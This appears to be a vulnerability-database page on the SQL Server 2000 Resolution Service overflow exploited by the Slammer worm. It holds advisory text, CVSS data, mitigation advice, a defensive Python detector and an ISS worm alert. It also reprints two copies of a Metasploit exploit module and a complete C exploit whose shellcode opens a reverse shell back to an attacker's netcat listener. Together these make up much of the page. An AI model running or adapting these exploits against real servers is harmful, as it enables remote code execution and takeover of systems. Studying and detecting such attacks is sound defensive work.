CVE-2002-0649
CVSS7.5
Published: 2002-08-12 00:00:00
Revised: 2016-10-17 22:21:02

[Original] Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm.


[CNNVD] Microsoft SQL Server 2000 Resolution Service Remote Heap Buffer Overflow Vulnerability (MS02-039) (CNNVD-200208-006)

        Microsoft SQL Server 2000 is a commercial, large-scale database system developed by Microsoft.
        The Resolution Service of Microsoft SQL Server 2000 does not correctly handle UDP packets submitted by users; a remote attacker can exploit this to carry out a heap-based buffer overflow attack.
        Microsoft SQL Server 2000 can serve multiple SQL Server instances on a single physical host, each running as a separate service. Since the instances cannot all use the standard SQL Server session port (TCP 1433), the SQL Server Resolution Service listens on UDP port 1434 and gives clients a way to look up the network endpoint of a particular SQL Server instance.
        When the SQL Server Resolution Service receives on UDP port 1434 a packet whose first byte is set to 0x08, followed by an over-long string, followed by a ":" character and a number, a heap-based buffer overflow occurs. By corrupting the heap structure an attacker can overwrite an arbitrary memory location with an address of their choosing and thereby control the process's execution; carefully crafted string data can lead to execution of arbitrary instructions on the system with the privileges of the SQL Server process.
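The description above and the worm advisory later on this page give a defender enough to write a simple wire-level check: a Resolution Service request is one UDP datagram to port 1434 whose first byte is the message type, and the two dangerous types (0x04 and 0x08) are followed by a string that the vulnerable service copies into a fixed-size buffer, while legitimate lookups are only a few dozen bytes (Slammer's datagrams were 376 bytes). The following Python detector is an added example written for this page, not code from CNNVD, Microsoft or any of the advisories quoted here. The two thresholds (`MAX_INSTANCE_NAME`, `MAX_REQUEST_LEN`) are assumptions chosen for illustration, not values from Microsoft's protocol specification, and the sample datagrams are constructed.

```python
"""Flag over-long SQL Server Resolution Service (SSRP) requests on UDP/1434.

Added example for this page. The message types and the 'long string
terminated by a colon' trigger come from the advisory text above; the
length thresholds are this example's own assumptions.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

SSRP_PORT = 1434
MAX_INSTANCE_NAME = 32   # assumption: real instance names are short
MAX_REQUEST_LEN = 64     # assumption: a legitimate ping/lookup fits easily in 64 bytes

# Type bytes named on this page: 0x02 is the discovery ping the exploits'
# own check routines send; 0x04 and 0x08 are the two overflow triggers.
TYPE_NAMES = {0x02: "ping", 0x04: "instance lookup", 0x08: "type 0x08 request"}


@dataclass
class Verdict:
    msg_type: Optional[int]
    string_len: int
    suspicious: bool
    reasons: List[str]


def classify_ssrp(payload: bytes) -> Verdict:
    """Classify one UDP/1434 payload by type byte and trailing string length."""
    if not payload:
        return Verdict(None, 0, False, ["empty datagram"])
    msg_type = payload[0]
    text = payload[1:]
    # The string after the type byte ends at a NUL in a normal request, or at
    # the ':' that the advisory describes as terminating the over-long string.
    end = len(text)
    for sep in (b"\x00", b":"):
        pos = text.find(sep)
        if pos != -1:
            end = min(end, pos)
    string_len = end
    reasons = []
    if msg_type in (0x04, 0x08) and string_len > MAX_INSTANCE_NAME:
        reasons.append(
            f"type 0x{msg_type:02x} carries a {string_len}-byte string "
            f"(expected at most {MAX_INSTANCE_NAME})"
        )
    if len(payload) > MAX_REQUEST_LEN:
        reasons.append(f"datagram is {len(payload)} bytes (expected at most {MAX_REQUEST_LEN})")
    return Verdict(msg_type, string_len, bool(reasons), reasons)


@dataclass
class Datagram:
    src: str
    dst_port: int
    payload: bytes


def scan(datagrams: List[Datagram]) -> List[Tuple[str, Verdict]]:
    """Run the classifier over captured datagrams; only UDP/1434 is SSRP."""
    alerts = []
    for d in datagrams:
        if d.dst_port != SSRP_PORT:
            continue
        verdict = classify_ssrp(d.payload)
        if verdict.suspicious:
            alerts.append((d.src, verdict))
    return alerts


# Constructed sample traffic (not a real capture): two benign requests, two
# over-long ones, and one over-long payload sent to a port that is not SSRP.
SAMPLE = [
    Datagram("10.0.0.5", 1434, b"\x02"),
    Datagram("10.0.0.6", 1434, b"\x04MSSQLSERVER\x00"),
    Datagram("10.0.0.7", 1434, b"\x04" + b"A" * 300),
    Datagram("10.0.0.8", 1434, b"\x08" + b"B" * 200 + b":1"),
    Datagram("10.0.0.9", 53, b"\x04" + b"A" * 300),
]

if __name__ == "__main__":
    for src, v in scan(SAMPLE):
        print(f"{src}: {TYPE_NAMES.get(v.msg_type, 'unknown')}: " + "; ".join(v.reasons))
```

Because UDP source addresses are trivially spoofed (the workaround section below makes the same point), the source in an alert identifies where to look, not who is responsible; the useful outputs are the count of over-long requests per destination and the fact that any 0x04/0x08 request exceeded a few dozen bytes at all.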

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [performance may degrade or access to resources may be interrupted]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:microsoft:sql_server:2000      Microsoft SQL Server 2000
cpe:/a:microsoft:data_engine:2000     Microsoft data_engine 2000
cpe:/a:microsoft:sql_server:2000:sp2  Microsoft SQL Server 2000 Service Pack 2
cpe:/a:microsoft:sql_server:2000:sp1  Microsoft SQL Server 2000 Service Pack 1

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1077  MS SQL Server 2000 Resolution Service Buffer Overflow
*OVAL describes in detail how to detect this vulnerability; the referenced OVAL definition contains further technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0649
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0649
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-006
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=102760196931518&w=2
(UNKNOWN)  BUGTRAQ  20020725 Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR25072002)
http://marc.info/?l=ntbugtraq&m=102760479902411&w=2
(UNKNOWN)  NTBUGTRAQ  20020725 Microsoft SQL Server 2000 Unauthenticated System Compromise (#NISR25072002)
http://www.cert.org/advisories/CA-2002-22.html
(UNKNOWN)  CERT  CA-2002-22
http://www.cert.org/advisories/CA-2003-04.html
(UNKNOWN)  CERT  CA-2003-04
http://www.kb.cert.org/vuls/id/399260
(UNKNOWN)  CERT-VN  VU#399260
http://www.kb.cert.org/vuls/id/484891
(UNKNOWN)  CERT-VN  VU#484891
http://www.microsoft.com/technet/security/bulletin/ms02-039.asp
(VENDOR_ADVISORY)  MS  MS02-039
http://www.securityfocus.com/archive/1/archive/1/308306/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308321/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 Fw: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308324/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 Re: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308388/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 SQL Sapphire Worm Analysis
http://www.securityfocus.com/archive/1/archive/1/308393/30/26180/threaded
(UNKNOWN)  BUGTRAQ  20030125 RE: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308396/30/26150/threaded
(UNKNOWN)  BUGTRAQ  20030126 RE: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308418/30/26150/threaded
(UNKNOWN)  BUGTRAQ  20030125 Sapphire SQL Worm Analysis Complete
http://www.securityfocus.com/archive/1/archive/1/308419/30/26150/threaded
(UNKNOWN)  BUGTRAQ  20030126 Tool: Sapphire SQL Worm Scanner
http://www.securityfocus.com/archive/1/archive/1/308760/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030128 RE: MS SQL WORM IS DESTROYING INTERNET BLOCK PORT 1434!
http://www.securityfocus.com/archive/1/archive/1/308806/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030128 Re: MSDE contained in...
http://www.securityfocus.com/archive/1/archive/1/309096/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030129 Re: MSDE contained in...
http://www.securityfocus.com/archive/1/archive/1/309324/30/26120/threaded
(UNKNOWN)  BUGTRAQ  20030130 RE: MSDE contained in...
http://www.securityfocus.com/archive/1/archive/1/309776/30/26090/threaded
(UNKNOWN)  BUGTRAQ  20030201 The Spread of the Sapphire/Slammer SQL Worm
http://www.securityfocus.com/bid/5310
(UNKNOWN)  BID  5310

- Vulnerability information

Microsoft SQL Server 2000 Resolution Service Remote Heap Buffer Overflow Vulnerability (MS02-039)
High risk  Boundary condition error
2002-08-12 00:00:00 2012-11-30 00:00:00
Remote

- Advisories and patches

        Temporary workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Restrict access to UDP port 1434 at border firewalls, on gateway devices, or on the SQL Server host itself. Because the source address of a UDP datagram is easily spoofed, merely allowing only trusted IP addresses is not sufficient.
        Vendor patch:
        Microsoft
        ---------
        Microsoft has released a security bulletin (MS02-039) and the corresponding patch:
        MS02-039: Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution (Q323875)
        Link:
        http://www.microsoft.com/technet/security/bulletin/MS02-039.asp

        Patch download:
         * Microsoft SQL Server 2000:
        
        http://www.microsoft.com/Downloads/Release.asp?ReleaseID=40602

- Vulnerability information (16393)

Microsoft SQL Server Resolution Overflow (EDBID:16393)
windows remote
2010-04-30 Verified
0 metasploit
N/A
##
# $Id: ms02_039_slammer.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::MSSQL

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft SQL Server Resolution Overflow',
			'Description'    => %q{
					This is an exploit for the SQL Server 2000 resolution
				service buffer overflow. This overflow is triggered by
				sending a udp packet to port 1434 which starts with 0x04 and
				is followed by long string terminating with a colon and a
				number. This module should work against any vulnerable SQL
				Server 2000 or MSDE install (pre-SP3).

			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2002-0649'],
					[ 'OSVDB', '4578'],
					[ 'BID', '5310'],
					[ 'MSB', 'MS02-039'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'MSSQL 2000 / MSDE <= SP2',
						{
							'Platform' => 'win',
							'Ret'      => 0x42b48774,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'Jul 24 2002',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(1434)
			], self.class)
	end


	def check
		info = mssql_ping
		if (info['ServerName'])
			print_status("SQL Server Information:")
			info.each_pair { |k,v|
				print_status("   #{k + (" " * (15-k.length))} = #{v}")
			}
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit

		connect_udp
		print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
		print_status("Execute 'net start sqlserveragent' once access is obtained");

		# \x68:888 => push dword 0x3838383a
		buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"

		# Return to the stack pointer
		buf[ 97, 4] = [target.ret].pack('V')

		# Which lands right here
		buf[101, 6] = make_nops(6)

		# Jumps 8 bytes ahead
		buf[107, 2] = "\xeb\x08"

		# Write to thread storage space to avoid a crash
		buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')

		# And finally into the payload
		buf[117,payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		disconnect_udp
		handler
	end

end
		

- Vulnerability information (21652)

Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability (EDBID:21652)
windows remote
2002-07-25 Verified
0 David Litchfield
N/A
source: http://www.securityfocus.com/bid/5310/info

A vulnerability in Microsoft SQL Server 2000 could allow remote attackers to access target hosts. 

A problem in the SQL Server Resolution Service allows a remote attacker to execute arbitrary code on a vulnerable host. The attacker could exploit a heap-based buffer overflow in the resolution service by sending a maliciously crafted UDP packet to port 1434. 

***UPDATE:

A worm that may exploit this vulnerability has been detected in the wild. 

Administrators are advised to:

- Block all external access to database servers until more information is available.
- Deny access to TCP and UDP ports 1434 completely
- Implement filter rules for other ports to decrease the chances of compromise through yet unknown avenues, even if the patch for this particular vulnerability has been installed. 

Cisco has released an advisory that details workaround information. Microsoft recommends that affected users apply SQL Server 2000 Service Pack 3.

/*
MSSQL2000 Remote UDP Exploit!

Modified from "Advanced Windows Shellcode" by David Litchfield, david@ngssoftware.com

fix a bug.

Modified by lion, lion@cnhonker.net
Welcome to HUC Website http://www.cnhonker.com

*/


#include <stdio.h>
#include <stdlib.h>   /* exit(), atoi() */
#include <string.h>   /* strcpy(), strcat(), strncpy(), strlen(), memcpy() */
#include <ctype.h>    /* isalpha() */
#include <winsock2.h>

#pragma comment (lib,"Ws2_32") 

int GainControlOfSQL(void);
int StartWinsock(void);

struct sockaddr_in c_sa;
struct sockaddr_in s_sa;

struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="\x04";
char ping[8]="\x02";

char exploit_code[]=
	"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x1C"
	"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"
	"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"
	"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"
	"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"
	"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"
	"\x16\x50\x33\xC0\xB0\x0C\x03\xD8\x53\xFF"
	"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"
	"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"
	"\xC0\xB0\x0C\x03\xD8\x53\x8B\x45\xF4\x50"
	"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"
	"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"
	"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"
	"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"
	"\xD8\xBF\x7F\x01\x01\x01\x89\x7D\xD4\x40"
	"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"
	"\xFF\xCA\x66\x89\x45\xD2\x6A\x01\x6A\x02"
	"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x6A\x10"
	"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"	
	"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"
	"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"
	"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"
	"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"
	"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"
	"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"
	"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"
	"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"
	"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"
	"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"
	"\xFF\xD0\x90\x2F\x2B\x6A\x07\x6B\x6A\x76"
	"\x3C\x34\x34\x58\x58\x33\x3D\x2A\x36\x3D"
	"\x34\x6B\x6A\x76\x3C\x34\x34\x58\x58\x58"
	"\x58\x0F\x0B\x19\x0B\x37\x3B\x33\x3D\x2C"
	"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x2C"
	"\x58\x1B\x2A\x3D\x39\x2C\x3D\x08\x2A\x37"
	"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x3C"
	"\x58";


int main(int argc, char *argv[])
{
	unsigned int ErrorLevel=0,len=0,c =0;
	int count = 0;
	char sc[300]="";
	char ipaddress[40]="";
	unsigned short port = 0;
	unsigned int ip = 0;
	char *ipt="";
	char buffer[400]="";
	unsigned short prt=0;
	char *prtt="";


	if(argc != 2 && argc != 5)
	{
		printf("===============================================================\r\n");
		printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");
		printf("Modified from \"Advanced Windows Shellcode\"\r\n");
		printf("Code by David Litchfield, david@ngssoftware.com\r\n");
		printf("Modified by lion, fix a bug.\r\n");
		printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");
		printf("Usage:\r\n");
		printf("    %s Target [<NCHost> <NCPort> <SQLSP>]\r\n\n", argv[0]);
		printf("Example:\r\n");
		printf("Target is MSSQL SP 0:\r\n");
		printf("    C:\\>nc -l -p 53\r\n");
		printf("    C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);
		printf("Target is MSSQL SP 1 or 2:\r\n");
		printf("    c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);
		return 0;
	}

	strncpy(host, argv[1], 100);

	if(argc == 5)
	{
		strncpy(ipaddress, argv[2], 36);

		port = atoi(argv[3]);

		// SQL Server 2000 Service pack level
		// The import entry for GetProcAddress in sqlsort.dll
		// is at  0x42ae1010 but on SP 1 and 2 is at  0x42ae101C
		// Need to set the last byte accordingly

		if(argv[4][0] == 0x30)
		{
			printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");
			exploit_code[9]=0x10;
		}
		else
		{
			printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101C\r\n");
		}

	}

	ErrorLevel = StartWinsock();
	if(ErrorLevel==0)
	{
		printf("Starting Winsock Error.\r\n");
		return 0;
	}

	if(argc == 2)
	{
		strcpy(request,ping);

		GainControlOfSQL();
		return 0;
	}


	strcpy(buffer,exploit_code);

	// set this IP address to connect back to
	// this should be your address
	ip = inet_addr(ipaddress);
	ipt = (char*)&ip;
	buffer[142]=ipt[0];
	buffer[143]=ipt[1];
	buffer[144]=ipt[2];
	buffer[145]=ipt[3];

	// set the TCP port to connect on
	// netcat should be listening on this port
	// e.g. nc -l -p 80

	prt = htons(port);
	prt = prt ^ 0xFFFF;
	prtt = (char *) &prt;
	buffer[160]=prtt[0];
	buffer[161]=prtt[1];

	strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

	// Overwrite the saved return address on the stack
	// This address contains a jmp esp instruction
	// and is in sqlsort.dll.

	strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B0C9DC

	// Need to do a near jump
	strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

	// Need to set an address which is writable or
	// sql server will crash before we can exploit
	// the overrun. Rather than choosing an address
	// on the stack which could be anywhere we'll
	// use an address in the .data segment of sqlsort.dll
	// as we're already using sqlsort for the saved
	// return address

	// SQL 2000 no service packs needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// SQL 2000 Service Pack 2 needs the address here
	strcat(request,"\x01\x70\xAE\x42");

	// just a few nops
	strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");


	// tack on exploit code to the end of our request and fire it off
	strcat(request,buffer);

	GainControlOfSQL();

	return 0;
}


int StartWinsock()
{
	int err=0;
	WORD wVersionRequested;
	WSADATA wsaData;

	wVersionRequested = MAKEWORD(2,1);
	err = WSAStartup( wVersionRequested, &wsaData );
	if (err != 0)
	{
		printf("error WSAStartup 1.\r\n");
		return 0;
	}
	if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
	{
		printf("error WSAStartup 2.\r\n");
		WSACleanup( );
		return 0;
	}

	if (isalpha(host[0]))
	{
		he = gethostbyname(host);

		if (he == NULL)
		{
			printf("Can't get the ip of %s!\r\n", host);
			WSACleanup( );
			exit(-1);
		}

		s_sa.sin_addr.s_addr=INADDR_ANY;
		s_sa.sin_family=AF_INET;
		memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
	}
	else
	{
		s_sa.sin_family=AF_INET;
		s_sa.sin_addr.s_addr = inet_addr(host);
	}

	return 1;
}



int GainControlOfSQL(void)
{
	char resp[600]="";
	int snd=0,rcv=0,count=0, var=0;
	unsigned int ttlbytes=0;
	unsigned int to=2000;
	struct sockaddr_in        cli_addr;
	SOCKET            cli_sock;


	cli_sock=socket(AF_INET,SOCK_DGRAM,0);
	if (cli_sock==INVALID_SOCKET)
	{
		return printf("sock error\r\n");
	}

	cli_addr.sin_family=AF_INET;
	cli_addr.sin_addr.s_addr=INADDR_ANY;
	cli_addr.sin_port=htons((unsigned short)53);

	setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIMEO,(char *)&to,sizeof(unsigned int));
	if(bind(cli_sock,(LPSOCKADDR)&cli_addr,sizeof(cli_addr))==SOCKET_ERROR)
	{
		return printf("bind error");
	}

	s_sa.sin_port=htons((unsigned short)SQLUDPPort);

	if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
	{
		return printf("Connect error");
	}
	else
	{
		snd=send(cli_sock, request , strlen (request) , 0);
		printf("Packet sent!\r\n");
		printf("If you don't have a shell it didn't work.\r\n");
		rcv = recv(cli_sock,resp,596,0);
		if(rcv > 1)
		{
			while(count < rcv)
			{
				if(resp[count]==0x00)
				resp[count]=0x20;
				count++;
			}
			printf("%s",resp);
		}
	}
	closesocket(cli_sock);

	return 0;
}		

- Vulnerability information (F82929)

Microsoft SQL Server Resolution Overflow (PacketStormID:F82929)
2009-10-30 00:00:00
H D Moore  metasploit.com
exploit,overflow,udp
CVE-2002-0649

This is an exploit for the SQL Server 2000 resolution service buffer overflow. This overflow is triggered by sending a udp packet to port 1434 which starts with 0x04 and is followed by long string terminating with a colon and a number. This Metasploit module should work against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::MSSQL
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft SQL Server Resolution Overflow',
			'Description'    => %q{
				This is an exploit for the SQL Server 2000 resolution
				service buffer overflow. This overflow is triggered by
				sending a udp packet to port 1434 which starts with 0x04 and
				is followed by long string terminating with a colon and a
				number. This module should work against any vulnerable SQL
				Server 2000 or MSDE install (pre-SP3).
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2002-0649'],
					[ 'OSVDB', '4578'],
					[ 'BID', '5310'],
					[ 'MSB', 'MS02-039'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 
						'MSSQL 2000 / MSDE <= SP2',
						{
							'Platform' => 'win',
							'Ret'      => 0x42b48774,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'Jul 24 2002',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(1434)
				], self.class)
	end
	
	
	def check
		info = mssql_ping
		if (info['ServerName'])
			print_status("SQL Server Information:")
			info.each_pair { |k,v|
				print_status("   #{k + (" " * (15-k.length))} = #{v}")
			}
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		
		connect_udp
		print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
		print_status("Execute 'net start sqlserveragent' once access is obtained");

		# \x68:888 => push dword 0x3838383a
		buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
		
		# Return to the stack pointer
		buf[ 97, 4] = [target.ret].pack('V')
		
		# Which lands right here
		buf[101, 6] = make_nops(6)
		
		# Jumps 8 bytes ahead
		buf[107, 2] = "\xeb\x08"
		
		# Write to thread storage space to avoid a crash
		buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')
		
		# And finally into the payload
		buf[117,payload.encoded.length] = payload.encoded

		udp_sock.put(buf)

		disconnect_udp
		handler
	end

end
    

- Vulnerability information (F30751)

iss.slammer.worm.txt (PacketStormID:F30751)
2003-01-25 00:00:00
 
worm
CVE-2002-0649

ISS Security Advisory - The "Microsoft SQL Slammer Worm" is spreading via unpatched SQL servers. Once a vulnerable computer is compromised, the worm will infect that target, randomly select a new target, and resend the exploit and propagation code to that host sending a large amount of network traffic in the process which crashes some network equipment.

Alerts

Internet Security Systems Security Alert
January 25, 2003

Microsoft SQL Slammer Worm Propagation

Synopsis:

ISS X-Force has learned of a worm that is spreading via Microsoft SQL
servers. The worm is responsible for large amounts of Internet traffic as
well as millions of UDP/IP probes at the time of this alert's publication.
This worm attempts to exploit MS/SQL servers vulnerable to the SQL Server
Resolution service buffer overflow (CVE CAN-2002-0649). Once a vulnerable
computer is compromised, the worm will infect that target, randomly select a
new target, and resend the exploit and propagation code to that host.

Impact:

Although the Slammer worm is not destructive to the infected host, it does
generate a damaging level of network traffic when it scans for additional
targets. A large amount of network traffic is created by the worm, which
scans random IP addresses for vulnerable servers. Billions of attacks have
been detected in the last 12 hours from various industry sources, including
ISS MSS (Managed Security Services). ISS has received reports that several
major national ISPs were either experiencing severe latency or were completely
unreachable during the same time frame.

Affected Versions:

Microsoft SQL Server 2000
Microsoft Desktop Engine (MSDE) 2000

Note: Unpatched or base installations older than SP3 are vulnerable.

Description:

The Slammer worm propagates via Microsoft SQL installations without patches
from Microsoft Security Bulletin MS02-039 or higher. The main function of the
Slammer worm is to continue propagation. No DDOS or backdoor functionality is
incorporated into the worm.  Infection can be removed with a reboot, however
without protection in place, it is likely that vulnerable servers will be
quickly re-infected.

The Slammer worm loads Kernel32.dll and WS2_32.dll and then calls GetTickCount
which is used as a seed for a random IP address routine. This routine then
continuously sends 376 bytes of exploit and propagation code across port
1434/UDP until the SQL Server process is shut down. The Slammer worm does not
prefer to scan local subnet addresses like the Nimda worm. This will limit
the speed of propagation across local networks, but this scanning method
generates large amounts of traffic that can overwhelm networks.

The Slammer worm simply seeks to replicate itself and does not try to further
compromise servers or retain access to compromised hosts. The Slammer worm does
not infect or modify files, it only exists in memory.

Recommendations:

ISS X-Force recommends that system administrators immediately take steps to
protect their networks. To remove the infection, apply the necessary patches
listed below and restart the server. This action will remove the worm from
memory.

The following ISS updates address the issues described in this alert. These
updates are available from the ISS Download center (http://www.iss.net/download)

RealSecure Network Sensor XPU 20.4 and XPU 5.3 (available 9/17/02) or greater.

Internet Scanner XPU 6.15 (available 7/25/02).

Additionally ISS X-Force recommends blocking UDP port 1433 and 1434 traffic to
protect SQL Server databases with a firewall or packet filter.

Microsoft SQL Server customers should refer to the following address for
information and securing Microsoft SQL Server against this buffer overflow:
http://www.microsoft.com/technet/security/bulletin/MS02-039.asp.

Additional Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned the name
CAN-2002-0649 to this issue. This is a candidate for inclusion in the CVE
list (http://cve.mitre.org), which standardizes names for security problems.

NGSSoftware Insight Security Research Advisory #NISR25072002, "Unauthenticated
Remote Compromise in MS SQL Server 2000" at:
http://www.ngssoftware.com/advisories/mssql-udp.txt

Microsoft Security Bulletin MS02-039, "Buffer Overruns in SQL Server 2000
Resolution Service Could Enable Code Execution (Q323875)" at
http://www.microsoft.com/technet/security/bulletin/MS02-039.asp

CERT Advisory CA-2002-22, "Multiple Vulnerabilities in Microsoft SQL Server"
at: http://www.cert.org/advisories/CA-2002-22.html

CERT Vulnerability Note VU#484891, "Microsoft SQL Server 2000 contains stack
buffer overflow in SQL Server Resolution Service" at:
http://www.kb.cert.org/vuls/id/484891

NGSSoftware Insight Security Research Advisory #NISR03092002B, "Windows .NET
Server (RC1) and MSDE" at:
http://www.nextgenss.com/advisories/dotnet-msde.txt

Standards associated with this entry:
BID-5311: Microsoft SQL Server 2000 Resolution Service Stack Overflow
Vulnerability

______

About Internet Security Systems (ISS)
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a
pioneer and world leader in software and services that protect critical
online resources from an ever-changing spectrum of threats and misuse.
Internet Security Systems is headquartered in Atlanta, GA, with
additional operations throughout the Americas, Asia, Australia, Europe
and the Middle East.

Copyright (c) 2003 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If you
wish to reprint the whole or any part of this document in any other
medium excluding electronic media, please email  for
permission.

Disclaimer: The information within this paper may change without notice.
